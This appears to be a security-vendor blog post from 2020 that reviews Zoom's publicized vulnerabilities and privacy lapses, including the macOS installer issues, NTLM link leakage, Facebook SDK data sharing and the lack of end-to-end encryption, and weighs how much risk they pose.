Why This is a Big Deal Right Now
In the spring, the video conferencing app Zoom went from roughly 10 million daily meeting participants to over 300 million. As the global pandemic unfolded, it became a household name while businesses scrambled to transition to remote work, schools began holding classes online, and virtual happy hours became the primary means of socializing.
With that expanding user base and climbing stock valuation came a greater level of scrutiny. Two recently publicized vulnerabilities brought back into the spotlight a number of previous security and privacy missteps by the video conferencing leader.
Security is more important than ever right now, with cybercriminals taking advantage of fear and a widespread desire for information. The question is: should you (or your organization) avoid Zoom?
Thing is, security decisions are never simple, and there isn't one answer for everyone. In light of that, let's go through the list of issues that have made the news media rounds and lay out the relevant facts, so you can make an informed decision on whether Zoom is secure enough for you.
Vulnerabilities Exposed MacOS and Webcams
What brought all of this into the public consciousness? Ex-NSA hacker Patrick Wardle publicly disclosed two vulnerabilities. The first allowed a local attacker (someone with access to an account on the Mac) to use Zoom installation procedures to get root privilege control of the Mac, compromising the operating system itself. This exploited some strange software installation practices by Zoom; more on that upcoming.
The second vulnerability allowed malware to gain access to the webcam and microphone, without displaying a prompt or otherwise alerting the user. Zoom's use of a hardened runtime should have prevented the injection of potentially malicious code, but Zoom had a specific exception which allowed for this particular exploit.
How Serious Were Those Vulnerabilities?
Both of these vulnerabilities require that some kind of malware or untrusted user already be on the Mac in question. No security vulnerability exists in a vacuum, and every risk needs to be weighed in the context of how easy it is to exploit, what other layers of security exist around it, and what the consequences might be.
These Zoom vulnerabilities only become relevant if someone manages to get into your computer, just as leaving cash lying on your kitchen counter only becomes relevant if someone gets in the front door.
So let's try not to panic, and instead take a clear-eyed look at Zoom's track record and the current level of security in their product, so we can assess what level of risk it might present and how much to trust it.
Previous Zoom Security Issues (Fixed and Otherwise)
Windows Login Credentials
Disclosed: March 31, 2020 Fixed: April 1, 2020
It was reported on Bleeping Computer that, at the time, Zoom would convert network UNC paths into clickable links which, if clicked, could send an NTLM hash over the internet that could compromise login credentials.
That was possible because of some quirks in NTLM in Windows, which has been causing these types of problems for a long time. So it's sort of a chicken and the egg problem for who's to blame here: if Zoom didn't make these paths clickable, no exploit would be possible. But if NTLM weren't buggy in the first place, Zoom's linkification would be a non-issue.
Also of note here is that an attacker would have had to get you on a Zoom call and then get you to click a link, which definitely affects the risk assessment for how likely this bug was to have caused problems.
The Facebook Oops
Disclosed: March 25, 2020 Fixed: March 27, 2020
Motherboard reported that Zoom was sharing data on its mobile app users with Facebook. Which sounds bad, especially if one gets this information in the form of a sensational and (potentially) inaccurate headline.
If you look a little closer it begins to look, if still not great, then perhaps less bad. Zoom was using the Facebook SDK (software develop kit), which is common practice among apps trying to easily integrate features. That SDK automatically sends data back to Facebook. Though, Facebook's terms are transparent about this data collection, which left the onus on Zoom to share with its users what it probably should have known: Facebook gathers data.
The next thing to consider is the type of data that was being collected: the time that the user opened the app, what type of device they were using, their time zone, their carrier, and an advertising identifier which allowed companies to use targeted advertising for that device. Not all information is created equal, and none of this qualifies as personally identifiable information (PII). While passing any information without transparency is a blow to privacy, there's a difference between sharing device type and, say, name and address.
Reported:April 1, 2020 Fixed: April 2, 2020
Ever wondered how Zoom would magically open on a Mac without any visible installation process? Well, it turns out that was because it was hijacking pre-installation scripts. These scripts run without requiring any user action, and are intended only to check that the machine is capable of installing the program.
Zoom used these scripts to install itself without ever requiring the user to click 'yes, install this on my Mac.' This isn't necessarily a security vulnerability on its own, but is certainly circumventing Apple's intended process for informing users as to what's happening on their Macs.
It was this installation procedure which, in one of the two Wardle disclosures, could allow a local attacker to get root privileges.
Previous Install Workaround: The Web Server
Disclosed to Zoom: March 26, 2019 Fixed: June 24, 2019 Re-Disclosed Publicly (after a regression): July 8, 2019 Perma-fixed: July 9, 2019
Let's be real here: Zoom has, in several instances, done weird things to make it easier to install Zoom, and that's gotten them into trouble. Back in 2019, it came to light that Zoom created a web server on any Mac it was installed on that helped it circumvent Safari security protocols.
What was extra problematic about that workaround was that the web server stayed on your Mac even if you deleted the Zoom application, and would automatically reinstall Zoom if you tried to join a meeting.
That web server came to light when security researcher Jonathan Leitschuh posted a proof of concept detailing how the web server could be used to forcibly join a user to a Zoom call if they visited a malicious website.
Zoom subsequently removed the web server (around the same time that Apple also forcibly removed it from all Macs), but have they learned their lesson? Well, Zoom says yes. But you can make your own judgement.
Reported: March 31, 2020 Ongoing
The Intercept first reported that Zoom wasn't using true end-to-end encryption, despite assertions made by their marketing. The basic concept in end-to-end encryption is that no one but the people on either end of the call has access to the decrypted information. Facetime, for example, is end-to-end encrypted, which means (in theory) that no one, not even Apple, can eavesdrop. So were the federal government to subpoena them, Apple could just shrug emoji.
Zoom calls are encrypted, but it's in a less secure way and it's certainly not true end-to-end encryption. If the U.S. were to subpoena them (or China, as discussed in the Intercept), they could conceivably be compelled to hand over your Zoom calls. Further, if Zoom's infrastructure were compromised, bad actors could conceivably get access.
This is a challenging engineering problem, one that notably took Apple years to solve for Facetime (which still only allows for a maximum of 32 participants). However, with Zoom's recent acquisition of Keybase, they're working to fast-track end-to-end encryption.
That said, Zoom's current encryption is probably good enough for a lot of people, especially with their April 29 release of AES 256-bit GCM encryption with Zoom 5. It's certainly more secure than a phone call, which isn't encrypted at all. The level of security warranted is relative to the exploitable value of what's being protected. So it may not be ready for state secrets yet, but probably okay for happy hour with your mom.
What About Next Time?
When you line it all up, it does start to look concerning, and many security and privacy die-hards have accused Zoom of not adequately prioritizing security. In particular, the repeated attempts to make Zoom easier to install by circumventing the security measures of other applications are starting to look like a trend.
But Zoom has made a public commitment to improve, freezing feature updates for 90 days to focus on security. It remains to be seen how effective that will be, adding another drop of uncertainty to the veritable ocean of it we're all currently swimming in.
It might be that the next Zoom vulnerability is waiting around the corner, but unfortunately that's the case with all software. Bugs are inevitable, and some of them are going to create vulnerabilities. That's why security is such an important and complex undertaking.
An enterprise network with access to valuable information needs a higher level of security than a home network, with fail-safes to deal with vulnerability-caused breaches when—not if—they happen. Detection and response models of security are increasingly becoming the answer for sophisticated security operations, whether that's endpoint detection and response monitoring endpoints individually, or network detection and response looking at the broader picture of every communication traversing the network—or, best of all, both.
There is no perfect, vulnerability-free software. The only thing you can do is have a strong risk model so that when new threats inevitably arise, whether that's via zoom or anywhere else in your technology stack, you can respond accordingly.